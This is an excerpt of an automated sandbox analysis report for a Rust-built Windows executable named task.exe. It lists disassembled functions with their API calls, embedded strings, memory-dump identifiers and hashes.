                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: freeaddrinfo
                                                                                                                                                                • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()
                                                                                                                                                                • API String ID: 2731292433-2053607270
                                                                                                                                                                • Opcode ID: cfe38b3212c7a5b925aad9138daf38636edcf1f8c68a7b5e0cfb5e92d2c1e4b1
                                                                                                                                                                • Instruction ID: ce1664fdcb210fd79ee488947dd2c01d87f5c1e359d80a19e12c513c38a3c4e4
                                                                                                                                                                • Opcode Fuzzy Hash: cfe38b3212c7a5b925aad9138daf38636edcf1f8c68a7b5e0cfb5e92d2c1e4b1
                                                                                                                                                                • Instruction Fuzzy Hash: 43D198B5E007188FCB14CF98C580AADFBB1BF59314F26862ED8587B752D731A981CB94
                                                                                                                                                                Function 6C8FB681 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe, xrefs: 6C8FB69D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe
                                                                                                                                                                • API String ID: 0-3079267947
                                                                                                                                                                • Opcode ID: f682e8691a472f92ed03f29eff0c6f4d27afbb1bfb1e0e94596fc0d730765024
                                                                                                                                                                • Instruction ID: 2a793235ce31513b8a86daf3686b99ac09f4561b8008b26c3de4f9dc19dab883
                                                                                                                                                                • Opcode Fuzzy Hash: f682e8691a472f92ed03f29eff0c6f4d27afbb1bfb1e0e94596fc0d730765024
                                                                                                                                                                • Instruction Fuzzy Hash: A7215072204209ABD7309F6A8E8097A77A9EF033E87148D29E934D7A50DB35EC528760
                                                                                                                                                                Function 6C8F79F3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,425D10BB,00000000,?,00000000,6C905C90,000000FF,?,6C8F798D,?,?,6C8F7961,?), ref: 6C8F7A28
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C8F7A3A
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,6C905C90,000000FF,?,6C8F798D,?,?,6C8F7961,?), ref: 6C8F7A5C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                • Opcode ID: ad2b8f3f208d00515decb2dc00755070189d4f27bb52fb42c2111aa7da5d7a4e
                                                                                                                                                                • Instruction ID: c498e2fc9110a9b6bf3664c82739de477a3011945cf05d023824dd867389ed11
                                                                                                                                                                • Opcode Fuzzy Hash: ad2b8f3f208d00515decb2dc00755070189d4f27bb52fb42c2111aa7da5d7a4e
                                                                                                                                                                • Instruction Fuzzy Hash: 7E01A731A04969AFDB118F50CC05FAEBBF9FB45719F11492DE821E2A90EB34DA40CA90
                                                                                                                                                                Function 6C8D48C0 Relevance: 7.7, APIs: 5, Instructions: 212COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6C8D49C3
                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(?,00000002,00000000), ref: 6C8D49CE
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8D49DA
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8D49EC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$EnvironmentVariable
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2691138088-0
                                                                                                                                                                • Opcode ID: 655a546b51ead0b555deb20e3100ce2c6e8595b3ed3da347dc14d563f09177ea
                                                                                                                                                                • Instruction ID: 6f3937d48b1c179a89d7e7211b095ee5596cf053b97b57cdd403becb50585b4f
                                                                                                                                                                • Opcode Fuzzy Hash: 655a546b51ead0b555deb20e3100ce2c6e8595b3ed3da347dc14d563f09177ea
                                                                                                                                                                • Instruction Fuzzy Hash: 5D819EB2E00218AFDB208F98DD45BEDBBB4FF89318F150928E814B7741E775A944CB95
                                                                                                                                                                Function 6C8D46C0 Relevance: 7.6, APIs: 5, Instructions: 140COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6C8D4783
                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000002), ref: 6C8D478B
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8D4797
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8D47A9
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8D4843
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$CurrentDirectory
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3993060814-0
                                                                                                                                                                • Opcode ID: 9dbad613c25b93f4e87e0606fea2bf190af0f2609e4d31a6394e6422b1f5f00e
                                                                                                                                                                • Instruction ID: 2f4be96fa08e321ba2fe7e8b23d26dfc18f7e2eff016360c49864e18cf31117b
                                                                                                                                                                • Opcode Fuzzy Hash: 9dbad613c25b93f4e87e0606fea2bf190af0f2609e4d31a6394e6422b1f5f00e
                                                                                                                                                                • Instruction Fuzzy Hash: BF5115B1E0065C9BDB20CF98D94479EBBB8FFCA354F110919E814B7740E774A9448FA1
                                                                                                                                                                Function 6C8D2A80 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 303networkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • __rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...], xrefs: 6C8D996D
                                                                                                                                                                • s<unknown>, xrefs: 6C8D97B0
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6C8D97B5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Startup
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...]$s<unknown>
                                                                                                                                                                • API String ID: 724789610-600858821
                                                                                                                                                                • Opcode ID: fa22340b850c25b1702d4edab0a3ac9137f138476f2b6508b7fd087ff159e7c3
                                                                                                                                                                • Instruction ID: a798c12bbcc74540979fe76afe78db95912b2d3047f74c44f70c0cc5f66f8157
                                                                                                                                                                • Opcode Fuzzy Hash: fa22340b850c25b1702d4edab0a3ac9137f138476f2b6508b7fd087ff159e7c3
                                                                                                                                                                • Instruction Fuzzy Hash: 4CC198B5E007089FDB20CF94D980BDEBBB5FF4A318F108559E8586B742D735A985CBA0
                                                                                                                                                                Function 6C904F70 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                • assertion failed: state_and_queue.addr() & STATE_MASK == RUNNINGlibrary\std\src\sys\sync\once\queue.rs, xrefs: 6C9051F6
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6C9051C9
                                                                                                                                                                • use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 6C905194, 6C9051A5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$assertion failed: state_and_queue.addr() & STATE_MASK == RUNNINGlibrary\std\src\sys\sync\once\queue.rs$use of std::thread::current() is not possible after the thread's local data has been destroyed
                                                                                                                                                                • API String ID: 0-1711242015
                                                                                                                                                                • Opcode ID: febc12a76e03cd26732db987dc3117b6126c3229ae8509e37788a2cc2b0b158a
                                                                                                                                                                • Instruction ID: 0868642de91f963462e52a35c2af3e90806267e77a95d9ff247cc910ae05faea
                                                                                                                                                                • Opcode Fuzzy Hash: febc12a76e03cd26732db987dc3117b6126c3229ae8509e37788a2cc2b0b158a
                                                                                                                                                                • Instruction Fuzzy Hash: D971BD71A012089FDB11CFA8D8407DEBBB9EF05328F14062DE865ABB91DB71DA05CBD5
                                                                                                                                                                Function 6C8F5312 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6C8F52C3,00000000,?,00000001,?,?,?,6C8F53B2,00000001,FlsFree,6C911940,FlsFree), ref: 6C8F531F
                                                                                                                                                                • GetLastError.KERNEL32(?,6C8F52C3,00000000,?,00000001,?,?,?,6C8F53B2,00000001,FlsFree,6C911940,FlsFree,00000000,?,6C8F4234), ref: 6C8F5329
                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6C8F5351
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                                                                • Opcode ID: bd9eec78857ba6df185a4218149914f07d59b0ead799e34cdb50f37869705d6d
                                                                                                                                                                • Instruction ID: a7bbd445402a9806f50a3e27caa3cfa3ab909f981863c094b88d5db27966b8a8
                                                                                                                                                                • Opcode Fuzzy Hash: bd9eec78857ba6df185a4218149914f07d59b0ead799e34cdb50f37869705d6d
                                                                                                                                                                • Instruction Fuzzy Hash: 1AE09231388209B6EF201A66DD06B193B689B03794F248424FA1CE88D2D7B2D552C580
                                                                                                                                                                Function 6C8DE420 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32), ref: 6C8DE428
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6C8DE438
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                • String ID: SetThreadDescription$kernel32
                                                                                                                                                                • API String ID: 1646373207-1950310818
                                                                                                                                                                • Opcode ID: e1c83324c563d7864ff42a96ea27d854582afdfee0786dd65023a9151ffb1d89
                                                                                                                                                                • Instruction ID: 270eae2d0a59226efa7bb7b7c42f08d9c7e335273d73117116cf159e10d50630
                                                                                                                                                                • Opcode Fuzzy Hash: e1c83324c563d7864ff42a96ea27d854582afdfee0786dd65023a9151ffb1d89
                                                                                                                                                                • Instruction Fuzzy Hash: F7D012B038C718DF9B684F76590972276F9A742542721482DD405D2E00DF21E84487D5
                                                                                                                                                                Function 6C8E0380 Relevance: 6.4, APIs: 5, Instructions: 130COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001), ref: 6C8E03BE
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001), ref: 6C8E03E2
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000), ref: 6C8E0440
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000), ref: 6C8E04A1
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000), ref: 6C8E04C3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                • Opcode ID: b3032c63bfdd7423a4f05fd7165f6a757cf4a755f1f45097f24dce9a7900d3d2
                                                                                                                                                                • Instruction ID: d41fa59438f7ddd08ee20227c983991f9566539cef473043e3f51d1f2f69fc31
                                                                                                                                                                • Opcode Fuzzy Hash: b3032c63bfdd7423a4f05fd7165f6a757cf4a755f1f45097f24dce9a7900d3d2
                                                                                                                                                                • Instruction Fuzzy Hash: 7641E6B1B442448BDB208F64DA44BAB77B5BB4B31DF140D2CE809E7B81DB70D944DB61
                                                                                                                                                                Function 6C8E0540 Relevance: 6.4, APIs: 5, Instructions: 128COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • TlsGetValue.KERNEL32(00000003), ref: 6C8E057E
                                                                                                                                                                • TlsGetValue.KERNEL32(00000003), ref: 6C8E05A2
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000), ref: 6C8E0600
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000), ref: 6C8E0661
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000), ref: 6C8E0683
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                • Opcode ID: 6637edfc8574e59bb87585fbe1ae8ee90f35949940be887c1a87be0d65b27cee
                                                                                                                                                                • Instruction ID: d9218860e400289bd4b268fc755529606826d49eac50e2538c2c5e3fe4e9c2dd
                                                                                                                                                                • Opcode Fuzzy Hash: 6637edfc8574e59bb87585fbe1ae8ee90f35949940be887c1a87be0d65b27cee
                                                                                                                                                                • Instruction Fuzzy Hash: 324109B1A453449BDB208FA4C944B9A77B4BB8B715F140D2CD409E7B91DF71DD40DB90
                                                                                                                                                                Function 6C8E0280 Relevance: 6.4, APIs: 5, Instructions: 102COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001,?,00000000,?,00000004,00000010,?,?,?,?,?,?,?,6C906AC4,6C90DDE0), ref: 6C8E0292
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,00000010,?,?,?,?,?,?,?,6C906AC4,6C90DDE0), ref: 6C8E02B8
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001,?,?,?,?,?,?,?,6C906AC4,6C90DDE0), ref: 6C8E02CE
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C906AC4,6C90DDE0), ref: 6C8E030D
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C906AC4,6C90DDE0), ref: 6C8E0348
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                • Opcode ID: f9c3930c6c67627ffe7f0b263922182ec2d3f120c683ca58cbd8f5c80017832f
                                                                                                                                                                • Instruction ID: c57989eada6502f60c1767ef057052017d77fdd6f0a1e593e6a33dc8512a77a2
                                                                                                                                                                • Opcode Fuzzy Hash: f9c3930c6c67627ffe7f0b263922182ec2d3f120c683ca58cbd8f5c80017832f
                                                                                                                                                                • Instruction Fuzzy Hash: 30217DB57492805FEB2143B9A9C8B6537E9A79731AF184C6DF449CBA81DF70C444D321
                                                                                                                                                                Function 6C8FCC04 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetConsoleOutputCP.KERNEL32(425D10BB,00000000,00000000,?), ref: 6C8FCC67
                                                                                                                                                                  • Part of subcall function 6C8FC276: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C9011FF,?,00000000,-00000008), ref: 6C8FC2D7
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6C8FCEB9
                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C8FCEFF
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8FCFA2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2112829910-0
                                                                                                                                                                • Opcode ID: 9252412824798a3b8a0ccc8f1dc9be0398095e24a1ece0dc548d7b3b3f57d186
                                                                                                                                                                • Instruction ID: f41662255cda539f48fef256f0aae483f7efb06bc2e3904c010b9d20ea4d8147
